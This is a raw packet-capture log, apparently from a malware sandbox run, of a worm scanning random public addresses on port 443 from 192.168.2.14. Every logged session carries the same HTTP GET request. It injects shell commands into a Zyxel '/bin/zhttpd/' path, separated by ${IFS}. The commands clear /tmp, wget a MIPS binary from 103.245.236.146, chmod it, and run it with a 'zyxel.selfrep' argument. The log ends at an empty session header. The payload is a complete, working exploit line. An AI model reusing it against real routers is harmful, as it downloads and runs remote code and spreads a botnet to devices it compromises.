                                                        Jan 28, 2024 10:12:43.220077991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1999192.168.2.1440056210.79.33.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220113993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2000192.168.2.144216412.207.98.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220143080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2001192.168.2.1447914183.6.26.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220169067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2002192.168.2.145885654.248.254.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220199108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2003192.168.2.145513660.133.189.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220258951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2004192.168.2.144726274.157.65.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220293999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2005192.168.2.1448878153.155.245.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220336914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2006192.168.2.1454258126.171.106.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220366001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2007192.168.2.1458424115.167.84.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220401049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2008192.168.2.1452816176.251.251.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220443010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2009192.168.2.1460678170.35.202.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220477104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2010192.168.2.1445970208.154.63.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220535994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2011192.168.2.1449168165.215.24.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220592976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2012192.168.2.1445902195.66.57.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220619917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2013192.168.2.1445302152.241.36.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220670938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2014192.168.2.145835268.200.221.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220719099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2015192.168.2.1455152162.189.242.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220753908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2016192.168.2.143348827.94.91.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220804930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2017192.168.2.1460652147.36.152.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220837116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2018192.168.2.145702848.120.37.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220875025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2019192.168.2.143296420.71.5.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220921993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2020192.168.2.1441838172.2.216.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220966101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2021192.168.2.1436380208.42.188.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.220997095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2022192.168.2.143888636.206.118.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221043110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2023192.168.2.145141214.120.56.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221062899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2024192.168.2.145457694.214.95.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221098900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2025192.168.2.144481275.51.163.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221154928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2026192.168.2.1444320103.86.58.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221200943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2027192.168.2.143732295.77.142.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221234083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2028192.168.2.1449064130.28.36.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221266031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2029192.168.2.1437066141.194.211.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221299887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2030192.168.2.1449210212.190.157.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221323013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2031192.168.2.1445244144.142.1.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221381903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2032192.168.2.143885852.107.96.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221406937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2033192.168.2.145863849.7.26.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221451998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2034192.168.2.144483482.165.197.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221477032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2035192.168.2.1443610223.23.247.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221529007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2036192.168.2.1457286138.4.160.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221554041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2037192.168.2.1456560212.137.56.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221585035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2038192.168.2.1453756184.54.13.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221631050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2039192.168.2.1453588135.172.253.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221682072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2040192.168.2.1454324208.32.32.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221703053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2041192.168.2.1445516165.13.53.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221743107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2042192.168.2.145351240.52.141.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221782923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2043192.168.2.1457220156.50.220.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221811056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2044192.168.2.1450972195.150.182.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221862078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2045192.168.2.1444112158.56.172.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221900940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2046192.168.2.143548664.26.233.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221929073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2047192.168.2.143774036.167.197.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221961975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2048192.168.2.1460868118.63.215.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.221997023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2049192.168.2.1460468141.130.113.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222053051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2050192.168.2.145749041.7.93.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222090960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2051192.168.2.1451604180.7.30.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222121000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2052192.168.2.144715661.213.21.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222184896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2053192.168.2.144202413.189.183.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222197056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2054192.168.2.145485225.110.197.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222243071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2055192.168.2.1456756129.70.22.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222275019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2056192.168.2.145137639.21.26.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222320080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2057192.168.2.1438944206.176.212.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222356081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2058192.168.2.1459130195.172.101.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:43.222395897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2059192.168.2.1453540142.92.163.177443
                                                        TimestampBytes transferredDirectionData
